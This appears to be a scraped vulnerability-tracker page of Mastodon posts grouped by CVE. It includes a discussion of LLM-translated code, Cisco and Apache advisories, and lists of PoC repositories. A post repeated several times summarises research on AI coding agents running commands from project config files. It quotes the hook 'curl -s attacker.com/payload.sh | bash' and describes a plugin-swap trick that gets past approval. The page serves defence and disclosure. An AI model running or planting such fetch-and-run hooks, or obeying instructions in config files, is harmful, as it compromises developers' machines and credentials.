The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as dpc.pw/posts/i-dont-want-your-), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 cs.fsu.edu/~whalley/papers/tec). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (newsletter.semianalysis.com/p/), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as dpc.pw/posts/i-dont-want-your-), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 cs.fsu.edu/~whalley/papers/tec). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

CVE-2025-59250
(8.1 HIGH)

EPSS: 0.08%

updated 2025-11-24T17:38:57

2 posts

Improper input validation in JDBC Driver for SQL Server allows an unauthorized attacker to perform spoofing over a network.

AAKL at 2026-04-28T16:31:35.296Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/

##

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-20362
(6.5 MEDIUM)

EPSS: 43.64%

updated 2025-11-06T14:51:19.950000

1 posts

Update: On November 5, 2025, Cisco became aware of a new attack variant against devices running Cisco Secure ASA Software or Cisco Secure FTD Software releases that are affected by CVE-2025-20333 and CVE-2025-20362. This attack can cause unpatched devices to unexpectedly reload, leading to denial of service (DoS) conditions. Cisco strongly recommends that all customers upgrade to the fixed softwar

Nuclei template

netsecio@mastodon.social at 2026-04-28T16:41:33.000Z ##

📰 CISA Discovers 'FIRESTARTER' Backdoor on Federal Cisco Firewall; Malware Survives Patches

🔥 CISA finds new 'FIRESTARTER' backdoor on a federal agency's Cisco firewall. The malware survives patches and firmware updates, allowing persistent access. Exploited CVE-2025-20333 & CVE-2025-20362. #CyberSecurity #CISA #Backdoor #Cisco

🔗 cyber.netsecops.io

##

CVE-2025-48924
(5.3 MEDIUM)

EPSS: 0.04%

updated 2025-11-04T22:16:17.823000

2 posts

Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError cou

1 repos

https://github.com/njawalkar/apache-commons-lang2

AAKL at 2026-04-28T16:31:35.296Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/

##

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-20333
(9.9 CRITICAL)

EPSS: 24.78%

updated 2025-10-28T13:58:58.610000

1 posts

A vulnerability in the VPN web server of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an authenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to improper validation of user-supplied input in HTTP(S) requests. An attacker with valid VPN user credentials cou

netsecio@mastodon.social at 2026-04-28T16:41:33.000Z ##

📰 CISA Discovers 'FIRESTARTER' Backdoor on Federal Cisco Firewall; Malware Survives Patches

🔥 CISA finds new 'FIRESTARTER' backdoor on a federal agency's Cisco firewall. The malware survives patches and firmware updates, allowing persistent access. Exploited CVE-2025-20333 & CVE-2025-20362. #CyberSecurity #CISA #Backdoor #Cisco

🔗 cyber.netsecops.io

##

CVE-2025-59536
(8.8 HIGH)

EPSS: 0.03%

updated 2025-10-23T12:46:37.910000

2 posts

Claude Code is an agentic coding tool. Versions before 1.0.111 were vulnerable to Code Injection due to a bug in the startup trust dialog implementation. Claude Code could be tricked to execute code contained in a project before the user accepted the startup trust dialog. Exploiting this requires a user to start Claude Code in an untrusted directory. Users on standard Claude Code auto-update will

4 repos

https://github.com/NetVanguard-cmd/CVE-2025-59536

https://github.com/Rohitberiwala/Claude-Code-MCP-Injection-PoC

https://github.com/TreRB/ai-ide-config-guard

https://github.com/DBarr3/AETHER-PROTOCOL-P

hasamba at 2026-04-28T17:35:16.951Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI -2025-59536 -2025-61260 -2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2024-21413
(9.8 CRITICAL)

EPSS: 92.99%

updated 2025-10-22T00:33:00

1 posts

Microsoft Outlook Remote Code Execution Vulnerability

35 repos

https://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

https://github.com/PolarisXSec/CVE-2024-21413

https://github.com/D1se0/CVE-2024-21413-Vulnerabilidad-Outlook-LAB

https://github.com/bhatbhupendra/Moniker-Link--CVE-2024-21413-

https://github.com/Heera-V/CVE2024-21413

https://github.com/MSeymenD/CVE-2024-21413

https://github.com/SallocinAvalcante/lab-SMB-responder-CVE-2024-21413

https://github.com/hau2212/Moniker-Link-CVE-2024-21413-

https://github.com/eylommaayan/THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

https://github.com/dshabani96/CVE-2024-21413

https://github.com/KartheekKandalam99/SVPT_CW_2

https://github.com/CMNatic/CVE-2024-21413

https://github.com/E-m-e-k-a/Moniker-Link-Lab-Setup

https://github.com/gurleen-147/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

https://github.com/th3Hellion/CVE-2024-21413

https://github.com/MQKGitHub/Moniker-Link-CVE-2024-21413

https://github.com/ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

https://github.com/duy-31/CVE-2024-21413

https://github.com/mmathivanan17/CVE-2024-21413

https://github.com/yass2400012/Email-exploit-Moniker-Link-CVE-2024-21413-

https://github.com/ViniciusFariasDev/cve-2024-21413-outlook-monikerlink-lab

https://github.com/olebris/CVE-2024-21413

https://github.com/FathanahHidayati/https-github.com-xaitax-CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

https://github.com/securenetexpert/CVE-2024-21413-Moniker-Link-Writeup

https://github.com/ShubhamKanhere307/CVE-2024-21413

https://github.com/dionissh/CVE-2024-21413

https://github.com/TheMursalin/HTB-Mailing-A-Complete-Walkthrough

https://github.com/ThemeHackers/CVE-2024-21413

https://github.com/Cyber-Trambon/CVE-2024-21413-exploit

https://github.com/pedro-lucas-melo/Estudo-de-Caso-CVE-2024-21413

https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit

https://github.com/Redfox-Security/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape

https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

https://github.com/r00tb1t/CVE-2024-21413-POC

https://github.com/ArtemCyberLab/Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

thecybermind@infosec.exchange at 2026-04-28T09:23:39.000Z ##

CVE-2024-21413 (CVSS 9.8) is actively exploited and bypasses Outlook Protected View to enable remote code execution and NTLM hash theft. Here’s the enterprise risk breakdown, detection strategy, and mitigation roadmap security leaders need now.

thecybermind.co/2026/04/28/bri

##

CVE-2025-54136
(7.2 HIGH)

EPSS: 0.11%

updated 2025-08-25T01:41:36.580000

2 posts

Cursor is a code editor built for programming with AI. In versions 1.2.4 and below, attackers can achieve remote and persistent code execution by modifying an already trusted MCP configuration file inside a shared GitHub repository or editing the file locally on the target's machine. Once a collaborator accepts a harmless MCP, the attacker can silently swap it for a malicious command (e.g., calc.e

1 repos

https://github.com/PRE5T0/CVE-2025-54136

hasamba at 2026-04-28T17:35:16.951Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI -2025-59536 -2025-61260 -2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2025-27636
(5.6 MEDIUM)

EPSS: 35.52%

updated 2025-06-23T18:54:52.400000

1 posts

Bypass/Injection vulnerability in Apache Camel components under particular conditions. This issue affects Apache Camel: from 4.10.0 through <= 4.10.1, from 4.8.0 through <= 4.8.4, from 3.10.0 through <= 3.22.3. Users are recommended to upgrade to version 4.10.2 for 4.10.x LTS, 4.8.5 for 4.8.x LTS and 3.22.4 for 3.x releases. This vulnerability is present in Camel's default incoming header fil

3 repos

https://github.com/Crystallen1/CVE-2025-27636-demo

https://github.com/enochgitgamefied/CVE-2025-27636-Practical-Lab

https://github.com/akamai/CVE-2025-27636-Apache-Camel-PoC

thehackerwire@mastodon.social at 2026-04-27T17:03:51.000Z ##

🔴 CVE-2026-40453 - Critical (9.9)

The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was no...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-52046
(9.8 CRITICAL)

EPSS: 80.14%

updated 2025-02-11T19:03:55

1 posts

The `ObjectSerializationDecoder` in Apache MINA uses Java’s native deserialization protocol to process incoming serialized data but lacks the necessary security checks and defenses. This vulnerability allows attackers to exploit the deserialization process by sending specially crafted malicious serialized data, potentially leading to remote code execution (RCE) attacks. This issue affects MINA c

thehackerwire@mastodon.social at 2026-04-27T10:29:10.000Z ##

🔴 CVE-2026-41409 - Critical (9.8)

The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been exec...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2022-24138
(7.8 HIGH)

EPSS: 0.28%

updated 2024-11-21T06:49:53.140000

1 posts

IOBit Advanced System Care (Asc.exe) 15 and Action Download Center both download components of IOBit suite into ProgramData folder, ProgramData folder has "rwx" permissions for unprivileged users. Low privilege users can use SetOpLock to wait for CreateProcess and switch the genuine component with a malicious executable thus gaining code execution as a high privilege user (Low Privilege -> high in

usernameone101@infosec.exchange at 2026-04-28T12:31:25.000Z ##

Just an update on the IObit Advanced SystemCare zero-day I posted about a couple days ago. I mentioned in that post VulDB marked it as a duplicate of CVE-2022-24138 and while I agree with the root cause analysis being the same (ProgramData permission issues) the actual exploit chain is quite different. I found a named pipe that lets a low-priv user trigger a SYSTEM integrity file write on-demand. Since IObit has a concrete history of not replying to researchers and history repeats, here is the full write-up:

github.com/usernameone101/Writ

#zeroday #infosec #cybersec #cybersecurity #bug #vulnerability

##

CVE-2026-42208
(0 None)

EPSS: 0.00%

2 posts

N/A

1 repos

https://github.com/imjdl/CVE-2026-42208_lab

CVE-2026-25262
(0 None)

EPSS: 0.00%

1 posts

N/A

hackmag@infosec.exchange at 2026-04-27T18:00:04.000Z ##

⚪️ Kaspersky Lab experts discover vulnerability in Snapdragon chipsets

🗨️ Experts from Kaspersky ICS CERT have discovered a vulnerability in Qualcomm Snapdragon chipsets. The issue was found in the BootROM boot firmware, which is embedded at the hardware level. Chipsets from these series are widely used in smartphones, tablets, automotive…

🔗 hackmag.com/news/cve-2026-2526

#news

##

Visit counter For Websites